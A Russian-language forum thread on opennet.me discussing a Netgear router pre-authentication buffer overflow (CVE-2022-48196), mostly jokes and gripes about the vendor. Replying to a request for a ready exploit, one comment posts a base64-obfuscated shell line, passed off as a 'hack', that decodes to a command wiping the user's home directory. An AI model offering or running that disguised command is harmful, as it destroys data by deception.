URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 129413
[ Назад ]

Исходное сообщение
"Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации"

Отправлено opennews , 03-Янв-23 09:34 
Компания Netgear выпустила обновление прошивок к беспроводным маршрутизаторам серий RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7000, R7960P и R8000P, в которых устранена уязвимость (CVE-2022-48196), позволяющая добиться переполнения буфера без прохождения аутентификации. Технические детали и информация о наличии эксплоитов пока не приводится, но судя по выставленному уровню опасности и рекомендации незамедлительно обновить прошивку, проблема напоминает ноябрьскую уязвимость, позволявшую добиться выполнения своего кода с правами root через манипуляции во внешней сети на стороне WAN-интерфейса...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=58421


Содержание

Сообщения в этом обсуждении
"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 09:34 
Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 09:39 
Да

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 09:39 
Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 11:53 
HACK=`echo "ZGF0ZQo=" | base64 -d`; sh -c $HACK

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено aploskov.dev , 03-Янв-23 13:30 
Тогда уж, чтоб запомнилось.

HACK=`echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d`; sh -c $HACK


"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 10:32 
хорошая закладка для господина Майора... хорошая.
Теперь прийдется новую делать - отстой..

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 12:31 
прежнего майора повысили, не гоже оставлять свои наработки для молодняка

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 12:40 
Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Кирилл , 04-Янв-23 12:49 
О том и речь, что конспирология и "думать головой" - это вещи взаимоисключающие.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено InuYasha , 03-Янв-23 11:30 
Эти хоть патчат - и то молодцы.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 11:56 
>CVE-2022-48196
>2022

А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.


"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Атон , 03-Янв-23 14:29 
> Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

Всех, кого нужно, поимели задолго до того.  Так и узнали об уязвимости.


"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 14:11 
> переполнения буфера

Годы идут, но нестареющая классика продолжает радовать людей.


"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 04-Янв-23 00:59 
Буфера всегда радуют. Ну где-то с 13 лет и до самой старости.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 04-Янв-23 09:52 
Особенно, когда удаётся выйти за границы буфера.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 18:51 
Даже у нетгира нет денег и авторитета нанять настоящих сишников…

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 03-Янв-23 21:40 
Ору.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Аноним , 04-Янв-23 00:21 
Да они так то довольно среднепаршивая фирма. По жизни всякая хня с прошивками.

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."
Отправлено Омоним , 06-Янв-23 02:59 
Пластик у Netgear-овского железа - просто оцтой. А тут еще и вот это сцамое.